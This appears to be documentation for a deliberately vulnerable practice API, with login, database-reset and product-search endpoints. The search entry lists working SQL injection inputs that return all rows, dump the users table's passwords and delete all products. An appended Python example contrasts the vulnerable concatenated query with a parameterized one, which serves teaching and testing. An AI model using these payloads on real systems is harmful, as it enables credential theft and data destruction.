Normal Simple API

User Login

Authenticate user and receive session token

post
https://kong.nonamesec.org/normal/login

Body

application/json
email string(email) required

Example: sergio@company.com

password string(password) required

Example: SuperSecret123!

Response

200 application/json

Login successful

success boolean

Example: true

message string

Example: Login successful

session_token string

Example: a2cbce88465d6b36229e48e11f186e89b31aec7c79643cadb442a565ff546b6

user object

post /normal/login

Body

{ "email": "sergio@company.com", "password": "SuperSecret123!" }
 
200 application/json

Database

Database operations

Reset Database

Reinitializes database with default data

get
https://kong.nonamesec.org/normal/db/restart

Response

200 application/json

Database reset successful

message string

Example: Database restarted

get /normal/db/restart
 
200 application/json

Database Search

Searches products database using vulnerable SQL query concatenation

get
https://kong.nonamesec.org/normal/db/search

Query Parameters

query string

Search term

Expected value: RAM

For testing SQL injection:

  • Extract all products: %' OR '1'='1
  • Expose users table: %' UNION SELECT id, user, password, 'EXPOSED' FROM users--
  • Delete all products: %'; DELETE FROM products--

Default: RAM

Example: RAM

Response

200 application/json

Search results

results array[object]

get /normal/db/search
 
200 application/json
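
The query concatenation named in the Database Search description, shown beside a parameterized form of the same search. This is an added example, not the API's own code: SQLite, the products column names and the sample rows are assumptions, and the two inputs are test values listed for the query parameter above.

```python
import sqlite3

# Two of the test inputs listed for the `query` parameter on this page.
PAGE_INPUTS = [
    "%' OR '1'='1",
    "%' UNION SELECT id, user, password, 'EXPOSED' FROM users--",
]

def make_db():
    """In-memory stand-in; schema and rows are constructed for this example."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, category TEXT, note TEXT);
        CREATE TABLE users (id INTEGER, user TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'RAM 16GB', 'memory', 'in stock');
        INSERT INTO products VALUES (2, 'SSD 1TB', 'storage', 'in stock');
        INSERT INTO users VALUES (1, 'sample-user', 'sample-hash');
    """)
    return db

def search_concat(db, term):
    """Vulnerable: the search term is spliced into the SQL text itself."""
    sql = ("SELECT id, name, category, note FROM products "
           "WHERE name LIKE '%" + term + "%'")
    return db.execute(sql).fetchall()

def search_bound(db, term):
    """Hardened: the term is bound as data and its LIKE wildcards are escaped."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = ("SELECT id, name, category, note FROM products "
           "WHERE name LIKE ? ESCAPE '\\'")
    return db.execute(sql, ("%" + escaped + "%",)).fetchall()

def compare(db, term):
    """Row counts from both query styles for the same input."""
    return {"concat": len(search_concat(db, term)),
            "bound": len(search_bound(db, term))}

if __name__ == "__main__":
    db = make_db()
    for term in ["RAM"] + PAGE_INPUTS:
        print(repr(term), compare(db, term))
```

Binding fixes how the query is built; the database account behind a search endpoint should also be limited to read access on the tables it needs.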